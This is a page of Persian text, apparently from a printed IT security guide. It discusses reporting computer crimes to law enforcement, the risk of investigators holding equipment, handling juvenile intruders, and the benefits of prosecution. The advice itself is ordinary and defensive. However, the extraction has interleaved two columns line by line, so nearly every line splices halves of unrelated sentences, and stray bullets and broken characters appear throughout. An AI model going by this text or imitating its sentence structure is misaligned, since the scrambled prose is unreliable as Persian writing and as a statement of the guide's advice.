‫ﻳﺎﺑﻴﺪ ﻛﻪ ﺍﻳﻦ ﻋﻤﻞ ﺑﻪ ﺩﺳﺘﻮﺭ ﺩﺍﺩﮔﺎﻩ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺍﺳـﺖ؛ ﭼﺮﺍﻛـﻪ‬ ‫ﻗﺮﺍﺭ ﻧـﺪﺍﺭﺩ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺍﺣﺘﻤـﺎﻝ ﺑﻴـﺸﺘﺮﻱ ﻭﺟـﻮﺩ ﺧﻮﺍﻫـﺪ‬
‫ﺩﺭ ﻏﻴﺮﺍﻳﻨــﺼﻮﺭﺕ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺑﻨﻈــﺮ ﺑﻴﺎﻳــﺪ ﻛــﻪ ﻣــﺸﺘﺎﻕ‬ ‫ﺩﺍﺷﺖ ﻛﻪ ﻣﺴﺌﻮﻻﻥ ﻣﺤﻠـﻲ ﺑـﻪ ﻣـﺸﻜﻞ ﺷـﻤﺎ ﺍﻫﻤﻴـﺖ‬
‫ﻗﺮﺑﺎﻧﻲﺷﺪﻥ ﺑﻮﺩﻩﺍﻳﺪ‪ .‬ﺑﻬﺘﺮ ﺍﺳﺖ ﻛـﻪ ﻳـﻚ ﺷـﺨﺺ ﺑﻴﻄـﺮﻑ ﺭﺍ‬ ‫ﺩﻫﻨﺪ؛ ﺣﺘﻲ ﺍﮔﺮ ﺁﻥ ﻣﺸﻜﻞ ﺧﻴﻠﻲ ﻛﻮﭼﻚ ﺑﺎﺷﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﻫﻤﻜﺎﺭﻱ ﺑﺎ ﻧﻤﺎﻳﻨﺪﮔﺎﻥ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﻭ ﺩﻭﺍﻳﺮ ﺍﺟـﺮﺍﻱ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻫﺮﭼﻨﺪ ﺑﺮﺧﻲ ﺍﺯ ﻣﺴﺌﻮﻻﻥ ﻣﺤﻠﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺯﻣﻴﻨﺔ‬ ‫•‬


‫ﻗﺎﻧﻮﻥ ﻣﻌﺮﻓﻲ ﻛﻨﻴﺪ‪.‬‬ ‫ﺭﺍﻳﺎﻧﻪ ﻭ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻣﻬﺎﺭﺕ ﺯﻳﺎﺩﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﺍﻣﺎ‬
‫ﻣﻨﺶ ﻭ ﺭﻓﺘﺎﺭ ﻣﺠﺮﻳﺎﻥ ﻗﺎﻧﻮﻥ ﮔﻬﮕﺎﻩ ﻣـﺸﻜﻼﺕ ﺟـﺪﻱ ﺑﻮﺟـﻮﺩ‬ ‫ﺣﺘﻲ ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻫﻢ ﻋﻤﻮﻣﹰﺎ ﻣـﺴﺌﻮﻻﻥ ﻣﺤﻠـﻲ ﺍﺯ‬
‫ﻣﻲﺁﻭﺭﺩ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺧﻲ ﺗﺠﻬﻴﺰﺍﺕ ﺷﻤﺎ ﺑﻪ ﺑﻬﺎﻧـﺔ ﺑـﺎﺯﺟﻮﻳﻲ‬ ‫ﻣﺴﺌﻮﻻﻥ ﺍﻳـﺎﻟﺘﻲ ﻭ ﻛـﺸﻮﺭﻱ ﺗﺠﺮﺑـﺔ ﻛﻤﺘـﺮﻱ ﺩﺍﺭﻧـﺪ ﻭ‬
‫ﻳﺎ ﻛﻨﺘﺮﻝ ﺑﺮﺍﻱ ﻣﺪﺗﻬﺎﻱ ﻏﻴﺮﻗﺎﺑﻞ ﺗﻮﺟﻴﻬﻲ ﺗﻮﻗﻴﻒ ﺷﻮﻧﺪ ‪ -‬ﺣﺘﻲ‬ ‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﭘﻴﺸﺮﻓﺘﻪ ﺑﺮﺍﻳـﺸﺎﻥ ﺳـﺨﺖ‬
‫ﺍﮔﺮ ﺧﻮﺩ‪ ،‬ﻗﺮﺑﺎﻧﻲ ﻳﻚ ﺟﺮﻡ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺎﺷـﻴﺪ‪ .‬ﺍﮔـﺮ ﺷـﻤﺎ ﻗﺮﺑـﺎﻧﻲ‬ ‫ﺑﺎﺷــﺪ‪ .‬ﺩﺭ ﻋــﻮﺽ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ ﻛــﺸﻮﺭﻱ ﺍﺯ‬
‫ﻻ‬
‫ﺑﻮﺩﻩﺍﻳﺪ ﻭ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺧﻮﺩﺗﺎﻥ ﮔﺰﺍﺭﺵ ﻛـﺮﺩﻩﺍﻳـﺪ‪ ،‬ﻣﻌﻤـﻮ ﹰ‬ ‫ﻛﺎﺭﺷﻨﺎﺳﺎﻧﻲ ﺑﻬﺮﻩﻣﻨﺪﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺑـﻪ ﺳـﺮﻋﺖ‬
‫ﻣﻘﺎﻣﺎﺕ ﺷﻤﺎ ﺭﺍ ﺍﺯ ﺗﻼﺷﻬﺎﻳﺸﺎﻥ ﻣﻄﻠﻊ ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﻧﺎﺭﺿﺎﻳﺘﻲ ﺷﻤﺎ‬ ‫ﻭﺍﺭﺩ ﺟﺮﻳﺎﻥ ﺣﻞ ﻣﺸﻜﻼﺕ ﻛﺮﺩ‪.‬‬
‫ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺑﺮﺳﺎﻧﻨﺪ‪ .‬ﺑﺎ ﺍﻳﻨﺤـﺎﻝ ﺍﮔـﺮ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺍﺯ ﻛﺎﺭﻣﻨـﺪﺍﻥ‬ ‫ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻣﻘﺎﻣـﺎﺕ ﺍﻳـﺎﻟﺘﻲ ﻧـﺴﺒﺖ ﺑـﻪ ﻣﻘﺎﻣـﺎﺕ‬ ‫•‬
‫ﺧﻮﺩﺗﺎﻥ ﺑﺎﺷﻨﺪ ﻭ ﻳﺎ ﭘﺎﻱ ﻣﺴﺎﺋﻞ ﺣﺴﺎﺳﻲ ﭼﻮﻥ ﺍﻃﻼﻋﺎﺕ ﺭﺳﻤﻲ‬ ‫ﻛﺸﻮﺭﻱ ﻋﻼﻗﺔ ﺑﻴـﺸﺘﺮﻱ ﺑـﻪ ﺗﻌﻘﻴـﺐ ﻭ ﻛـﺸﻒ ﺟـﺮﺍﺋﻢ‬
‫ﻭ ﻧﻈﺎﻣﻲ ﺩﺭ ﻣﻴﺎﻥ ﺑﺎﺷﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﻧﻈـﺎﺭﺗﻲ ﺭﻭﻱ ﺭﻭﺵ‬ ‫ﺟﻮﺍﻧﺎﻥ ﻭ ﻧﻮﺟﻮﺍﻧﺎﻥ ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺍﮔﺮ ﻣﻲﺩﺍﻧﻴـﺪ ﻛـﻪ ﺍﺯ‬
‫ﻭ ﻣﺪﺗﻲ ﻛﻪ ﺳﻴـﺴﺘﻤﻬﺎ ﻭ ﺭﺳـﺎﻧﻪﻫـﺎﻱ ﺫﺧﻴـﺮﻩﺳـﺎﺯﻳﺘﺎﻥ ﺗﺤـﺖ‬ ‫ﺟﺎﻧﺐ ﻳﻚ ﻧﻮﺟﻮﺍﻥ ﻛﻪ ﺩﺭ ﺍﻳﺎﻟـﺖ ﺧﻮﺩﺗـﺎﻥ ﺍﻗﺎﻣـﺖ ﺩﺍﺭﺩ‬
‫ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﺍﻳﻦ ﻣﺸﻜﻞ ﺯﻣﺎﻧﻲ ﺣـﺎﺩﺗﺮ‬ ‫ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻳﺪ ﺑﻬﺘﺮ ﺍﺳﺖ ﺑﻪ ﻣﻘﺎﻣﺎﺕ ﻣﺤﻠـﻲ‬
‫ﻣﻲ ﺷﻮﺩ ﻛﻪ ﺑﺎﺯﺭﺳﺎﻥ ﭘﺮﻭﻧـﺪﻩ ﻧﻴﺎﺯﻣﻨـﺪ ﻫﻤﻜـﺎﺭﻱ ﻣﺘﺨﺼـﺼﺎﻧﻲ‬ ‫ﺭﺟﻮﻉ ﻧﻤﺎﻳﻴﺪ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻫﻢ ﺑﻬﺘﺮ ﺍﺳﺖ ﻛﻪ ﺭﺍﻫﻬـﺎﻱ‬
‫ﺧﺎﺭﺝ ﺍﺯ ﺩﻓﺎﺗﺮ ﻣﺤﻠﻲ ﺧﻮﺩ ﻧﻴﺰ ﺑﺎﺷﻨﺪ‪ .‬ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛـﻪ‬ ‫ﭘﻴﮕﺮﺩ ﻗﺎﻧﻮﻧﻲ ﺭﺍ ﻛﻨﺎﺭ ﺑﮕﺬﺍﺭﻳﺪ ﻭ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑـﺎ ﻭﺍﻟـﺪﻳﻦ ﻳـﺎ‬
‫ﺯﻣﺎﻥ ﺍﻳﺠﺎﺩ ﻭﻗﻔﻪ ﺩﺭ ﻛﺎﺭ ﺑﺪﻟﻴﻞ ﺷﺮﺍﻳﻂ ﺍﺟﺒﺎﺭﻱ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ‬ ‫ﻣﻌﻠﻤــﻴﻦ ﺁﻥ ﻣﻬــﺎﺟﻢ ﺟــﻮﺍﻥ ﺻــﺤﺒﺖ ﻛﻨﻴــﺪ )ﻳــﺎ ﺍﺯ ﻳــﻚ‬
‫ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻣﻲﻧﻤﺎﻳﻴﺪ؛ ﭼﺮﺍﻛﻪ ﺍﻳﻦ ﺯﻣﺎﻥ ﻭ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻧﺎﺷـﻲ ﺍﺯ‬ ‫ﺣﻘﻮﻗﺪﺍﻥ ﻳﺎ ﭘﻠﻴﺲ ﺑﺨﻮﺍﻫﻴﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺑﺮﺍﻱ ﺷﻤﺎ ﺍﻧﺠﺎﻡ ﺩﻫﺪ(‪.‬‬
‫ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﻗﺴﻤﺘﻲ ﺍﺯ ﺁﺳـﻴﺒﻬﺎﻱ ﻭﺍﺭﺩﺓ ﻫﻨﮕـﺎﻡ ﭘﻴﮕـﺮﺩ‬
‫ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﻭ ﻣﺘﻌﺎﻗﺒﹰﺎ ﺩﺭ ﻫﺮ ﺩﺍﺩﺧﻮﺍﺳﺖ ﻣـﺪﻧﻲ )ﺩﺍﺩﺧﻮﺍﺳـﺘﻬﺎﻳﻲ ﻛـﻪ‬ ‫ﻣﺨﺎﻃﺮﺍﺕ ﭘﻴﮕﺮﺩ ﻣﺘﻬﻤﺎﻥ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﻋﻠﻴﻪ ﻣﻬﺎﺟﻢ ﻭ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻧﻴﺰ ﻋﻠﻴﻪ ﺧـﻮﺩ ﺩﻭﺍﻳـﺮ ﺍﺟـﺮﺍﻱ ﻗـﻮﺍﻧﻴﻦ‬
‫ﺗﻨﻈﻴﻢ ﺷﻮﺩ( ﺑﻜﺎﺭ ﺭﻭﺩ‪.‬‬ ‫ﺩﺭ ﺍﺳﺘﻤﺪﺍﺩ ﺍﺯ ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﻣﺸﻜﻼﺕ ﺑﺎﻟﻘﻮﺓ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‬
‫ﻛﻪ ﻣﺤﺪﻭﺩ ﺑﻪ ﻣﺴﺎﺋﻠﻲ ﭼﻮﻥ ﺗﺠﺮﺑﺔ ﻛﺎ ﹺﺭ ﺁﻧﻬﺎ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﻭ ﺷﺒﻜﻪ ﻭ‬
‫ﺩﺭ ﺟﺮﻳﺎﻥ ﺗﺤﻘﻴﻘﺎﺕ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺑـﺴﻴﺎﺭ ﺑـﺎ‬
‫ﻳﺎ ﺗﻌﻘﻴﺐ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻧﻤﻲﺷﻮﺩ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﺍﺭﺯﺵ ﺑﻪ ﺷـﻤﺎﺭ ﻣـﻲﺭﻭﻧـﺪ‪ .‬ﻋـﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ‪ ،‬ﺩﺭﺻـﻮﺭﺕ ﻟـﺰﻭﻡ‬
‫ﻣﺮﺍﺟﻌﻲ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﻭ ﺗﺠﺮﺑﺔ ﻛﺎﻓﻲ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺭﺍﻳﺎﻧـﻪ ﻧﺪﺍﺭﻧـﺪ‬
‫ﺑﻤﻨﻈﻮﺭ ﺩﺭﻙ ﻧﻜﺎﺕ ﭘﺮﻭﻧﺪﻩ‪ ،‬ﺷﻤﺎ ﺭﺍ ﺩﻋﻮﺕ ﺑﻪ ﻫﻤﻜﺎﺭﻱ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٨٢‬‬

‫ﻣﺸﻜﻞ ﻓﻌﻠﻲ ﺷﻤﺎ ﺟﺰﺋﻲ ﺍﺯ ﻳﻚ ﻣﺸﻜﻞ ﮔﺴﺘﺮﺩﻩﺗـﺮ ﺑﺎﺷـﺪ ﻛـﻪ‬ ‫ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺻﻠﻲ ﺷﻤﺎ ﺗﺤـﺖ ﺑﺎﺯﺭﺳـﻲ ﻭ‬
‫ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻭ ﮔﺴﺘﺮﺵ ﺍﺳﺖ ﻭ ﻟﺬﺍ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺑﺪﺭﺳﺘﻲ ﺁﻧـﺮﺍ‬ ‫ﺁﺯﻣﺎﻳﺶ ﺍﺳﺖ‪ ،‬ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻣﺪﻳﺮﻳﺖ ﻧﻜﻨﻴﺪ ﺑﺎﻋﺚ ﻭﺍﺭﺩ ﺁﻣﺪﻥ ﺁﺳﻴﺒﻬﺎﻱ ﻓﺮﺍﻭﺍﻧـﻲ ﺑـﻪ ﺷـﻤﺎ ﻭ‬ ‫ﻭﻗﺘﻲ ﺑﺎ ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻱ ﻗﺎﻧﻮﻥ ﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ ﻫﻤﻜـﺎﺭﻱ‬
‫ﺩﻳﮕﺮﺍﻥ ﺷﻮﺩ‪.‬‬ ‫ﻣــﻲﻛﻨﻴــﺪ‪ ،‬ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺩﺭ ﺍﺛــﺮ ﺳــﻨﮕﻴﻨﻲ ﻭ ﻧﺎﻛﺎﺭﺁﻣــﺪﻱ ﺁﻥ‬
‫ﻣﺎ ﻋﻼﻗﻪﻣﻨﺪﻳﻢ ﻛﻪ ﺧﻮﺷﺒﻴﻨﺎﻧﻪ ﺑـﻪ ﺍﻳـﻦ ﻣﻮﺿـﻮﻉ ﻧﮕـﺎﻩ ﻛﻨـﻴﻢ‪.‬‬ ‫ﺗﺤﻘﻴﻘﺎﺕ‪ ،‬ﺩﻳﺪ ﺟﺎﻣﻌﺔ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧـﺴﺒﺖ ﺑـﻪ ﺷـﻤﺎ ﻣﻨﻔـﻲ ﺷـﻮﺩ‪.‬‬
‫ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﺑﻄﻮﺭ ﻛﻠـﻲ ﺍﺯ ﻧﻴـﺎﺯ ﺑـﻪ ﺍﺭﺗﻘـﺎﻱ ﺳـﻄﺢ ﺧـﻮﺩ ﺩﺭ‬ ‫ﺑﻴﺸﺘﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧﻪ ﺩﻳﺪﮔﺎﻫﻲ ﻣﻨﻔﻲ ﻧﺴﺒﺖ ﺑﻪ ﻣﺠﺮﻳﺎﻥ ﻗـﺎﻧﻮﻥ‬
‫ﻻ ﺩﺭ ﺗﻼﺷـﻨﺪ ﻛـﻪ‬ ‫ﺑﺮﺭﺳﻲ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻃﻼﻉ ﺩﺍﺭﻧﺪ ﻭ ﻣﻌﻤﻮ ﹰ‬ ‫ﺩﺍﺭﻧﺪ ﻭ ﺍﮔﺮ ﺷﻤﺎ ﻫﻢ ﺩﺭ ﺁﻥ ﺟﺎﻳﮕﺎﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ‪ ،‬ﺍﻳﻦ ﺍﺣﺴﺎﺳﺎﺕ‬
‫ﻣﺮﺍﻛﺰ ﺁﻣﻮﺯﺷﻲ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻨﺪ‪ ،‬ﺗﺸﻜﻴﻼﺕ ﻭ ﺗﺴﻬﻴﻼﺕ ﺗﺤﻠﻴـﻞ‬ ‫ﻣﺘﻮﺟﻪ ﺷﻤﺎ ﻧﻴﺰ ﻣﻲﺷﻮﺩ‪ .‬ﭼﻨﻴﻦ ﻗـﻀﺎﻭﺗﻬﺎﻳﻲ ﻣـﻲﺗﻮﺍﻧـﺪ ﺟﺎﻳﮕـﺎﻩ‬
‫ﻗﺎﻧﻮﻧﻲ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻨﺪ‪ ،‬ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﻳﮕﺮﻱ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ‬ ‫ﺷﻤﺎ ﺭﺍ ﺩﺭ ﺍﻧﻈﺎﺭ ﭘﺎﻳﻴﻨﺘﺮ ﺍﺯ ﺁﻧﭽﻪ ﻛﻪ ﻣـﺴﺘﺤﻖ ﺁﻥ ﻫـﺴﺘﻴﺪ ﻗـﺮﺍﺭ‬
‫ﻻ ﺩﺭ ﺩﺍﺩﺳﺮﺍﻫﺎ )ﺧﺼﻮﺻﹰﺎ ﺩﺭ ﻣﻨﺎﻃﻖ‬ ‫ﺛﻤﺮﺑﺨﺶ ﺭﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻧﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬ ‫ﺩﻫﺪ ﻭ ﺍﺯ ﻫﻤﻜﺎﺭﻱ ﺷﻤﺎ ﻧﻪ ﺗﻨﻬﺎ ﺑﺎ ﺁﻥ ﺗﺤﻘﻴﻘﺎﺕ ﺑﻠﻜـﻪ ﺑـﺎ ﺳـﺎﻳﺮ‬
‫ﭘﻴﺸﺮﻓﺘﺔ ﻛﺸﻮﺭ( ﺑﻌﻀﻲ ﺑﺎﺯﺭﺳﺎﻥ ﻭ ﺩﺍﺩﻳﺎﺭﻫﺎ ﺗﺠﺮﺑﺔ ﺯﻳـﺎﺩﻱ ﻛـﺴﺐ‬ ‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﺨﺼﺼﻲ ﻧﻴﺰ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳـﻦ ﭘـﺲ ﺍﺯ‬
‫ﻣﻲﻛﻨﻨﺪ ﻭ ﻟﺬﺍ ﺑﺎﻳﺪ ﺩﺭ ﺗﻼﺵ ﺑﺎﺷﻨﺪ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺧـﻮﺩ ﺭﺍ ﺑـﻪ‬ ‫ﭘﺎﻳﺎﻥﻳﺎﻓﺘﻦ ﺑﺎﺯﺭﺳﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻣﺎﺝ ﺣﻤﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻳـﺎ‬
‫ﺳﺎﻳﺮ ﻫﻤﻜﺎﺭﺍﻧﺸﺎﻥ ﻧﻴـﺰ ﺍﻧﺘﻘـﺎﻝ ﺩﻫﻨـﺪ‪ .‬ﻧﺘﻴﺠـﺔ ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ ﺩﺭ‬ ‫ﺳﺎﻳﺮ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩﻫﺎ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ‪.‬‬
‫ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﻳﻚ ﺍﺭﺗﻘﺎﻱ ﺍﺳﺎﺳﻲ ﺩﺭ ﺳـﻄﺢ ﻣﻮﻓﻘﻴـﺖ ﻓﻌﺎﻟﻴـﺖ‬ ‫ﺍﻳﻦ ﺭﻓﺘﺎﺭﻫﺎ ﻣﺎﻳـﺔ ﺗﺄﺳـﻔﻨﺪ‪ ،‬ﭼﺮﺍﻛـﻪ ﺑـﻪ ﻫـﺮ ﺣـﺎﻝ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﻭ ﺍﻧﺠـﺎﻡ ﺷـﺪﻥ ﺗﻌـﺪﺍﺩ ﺯﻳـﺎﺩﻱ ﺗﺤﻘﻴﻘـﺎﺕ ﻭ‬ ‫ﺑﺎﺯﺭﺳــﺎﻥ‪ ،‬ﺩﻗﻴــﻖ ﻭ ﺣﺮﻓــﻪﺍﻱ ﻫــﺴﺘﻨﺪ ﻭ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺑــﺮﺍﻱ‬
‫ﺩﺍﺩﺭﺳﻴﻬﺎﻱ ﻣﻮﻓﻖ ﺩﺭ ﺣﻮﺯﺓ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ﺑﻮﺩﻩ ﺍﺳﺖ‪ .‬ﺑﻬﺘﺮ ﺍﺳﺖ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻳﻚ ﻓﻌﺎﻟﻴﺖ ﻣﺸﻜﻮﻙ ﻳﺎ ﺗﻬﺎﺟﻢ ﺩﺍﺋﻤﻲ‪ ،‬ﻭﺍﻗﻌـﹰﺎ ﺑـﻪ‬
‫ﺑﻪ ﻓﻮﺍﻳﺪ ﺑﻴﺸﻤﺎﺭ ﮔﺰﺍﺭﺵﻛﺮﺩﻥ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ‪ -‬ﻧﻪ ﺗﻨﻬﺎ ﺑـﺮﺍﻱ‬
‫ﺑﺎﺯﺭﺳﻴﻬﺎﻱ ﻣﻮﺷﻜﺎﻓﺎﻧﻪ ﻧﻴـﺎﺯ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‪ .‬ﺍﻣـﺮﻭﺯ ﻣـﻲﺗـﻮﺍﻧﻴﻢ‬
‫ﺧﻮﺩﺗــﺎﻥ‪ ،‬ﺑﻠﻜــﻪ ﺑــﺮﺍﻱ ﺗﻤــﺎﻡ ﺟﺎﻣﻌــﻪ ‪ -‬ﺗﻮﺟــﻪ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻴﺪ‪:‬‬
‫ﺑﮕﻮﻳﻴﻢ ﻛﻪ ﺍﻳﻦ ﻣﺸﻜﻞ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﻛﻤﺘﺮ ﺷﺪﻩ ﻭ ﻧﮕﺮﺍﻧﻴﻬـﺎ‬
‫ﺩﺍﺩﺭﺳــﻴﻬﺎﻱ ﻣﻮﻓــﻖ ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﺑﺎﻋــﺚ ﺟﻠــﻮﮔﻴﺮﻱ ﺍﺯ ﺳــﻮﺀ‬
‫ﺩﺭ ﻣﻮﺭﺩ ﺁﻥ ﻧﺴﺒﺖ ﺑﻪ ﺩﻫﺔ ﮔﺬﺷﺘﻪ ﻛﺎﻫﺶ ﻳﺎﻓﺘﻪ ﺍﺳﺖ‪ .‬ﺑﻪ ﻣﺮﻭﺭ‬
‫ﺍﺳﺘﻔﺎﺩﻩﻫﺎﻱ ﺑﻌﺪﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻤﺎ ﻭ ﻧﻴﺰ ﺩﻳﮕﺮﺍﻥ ﺷﻮﻧﺪ‪.‬‬ ‫ﺯﻣﺎﻥ ﻭ ﺑﺎ ﺁﮔﺎﻫﺘﺮ ﺷﺪﻥ ﻣﺮﺩﻡ ﻧﺴﺒﺖ ﺑﻪ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻧﻔﻮﺫﮔﺮﺍﻥ ‪-‬‬
‫ﺣﺘﻲ ﺁﻧﻬﺎ ﻛﻪ ﺳﻮﺀ ﻧﻴﺘﻲ ﻧﺪﺍﺷﺘﻪﺍﻧﺪ‪ -‬ﺍﻧﺘﻈﺎﺭ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﺍﻳـﻦ‬
‫ﻣﺴﺌﻮﻟﻴﺖ ﮔﺰﺍﺭﺵ ﺟﺮﻡ‬
‫ﺍﺣﺴﺎﺳﺎﺕ ﻣﻨﻔﻲ ﻧﺴﺒﺖ ﺑﻪ ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﺍﺯ ﺍﻳﻦ ﻫـﻢ ﻛﻤﺮﻧﮕﺘـﺮ‬
‫ﺩﺭ ﭘﺎﻳﺎﻥ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻳﻚ ﺟﺮﻡ ﺗﻨﻬﺎ ﺩﺭﺻﻮﺭﺗﻲ ﻣﻮﺭﺩ‬ ‫ﺷﻮﺩ‪.‬‬
‫ﭘﻴﮕﺮﺩ ﻗﻀﺎﻳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ﻛﻪ ﺷﻤﺎ ﺁﻧﺮﺍ ﮔﺰﺍﺭﺵ ﻛـﺮﺩﻩ ﺑﺎﺷـﻴﺪ‪.‬‬
‫ﺗﻮﺻﻴﺔ ﺍﻛﻴﺪ ﻣﺎ ﺑﻪ ﺷﻤﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫﻨﮕﺎﻡ ﺗـﺼﻤﻴﻢﮔﻴـﺮﻱ ﺩﺭ‬
‫ﺩﺭ ﻏﻴﺮﺍﻳﻨﺼﻮﺭﺕ ﺍﻳﻨﻜﺎﺭ ﺍﻧﺠﺎﻡ ﻧﻤـﻲﺷـﻮﺩ ﻭ ﺍﻳـﻦ ﻧـﻪ ﺑـﻪ ﺳـﻮﺩ‬
‫ﻲ ﺳﻴﺴﺘﻢ ﺧـﻮﺩ ﺑـﺎ‬ ‫ﻣﻮﺭﺩ ﺩﺭﻣﻴﺎﻥ ﮔﺬﺍﺷﺘﻦ ﻫﺮﮔﻮﻧﻪ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺘ ﹺ‬
‫ﺷﻤﺎﺳﺖ ﻭ ﻧﻪ ﻫﻴﭽﻜﺲ ﺩﻳﮕﺮ؛ ﻭ ﺩﺳﺖ ﻧﻔﻮﺫﮔﺮ ﺭﺍ ﻧﻴﺰ ﺑﺮﺍﻱ ﻭﺍﺭﺩ‬
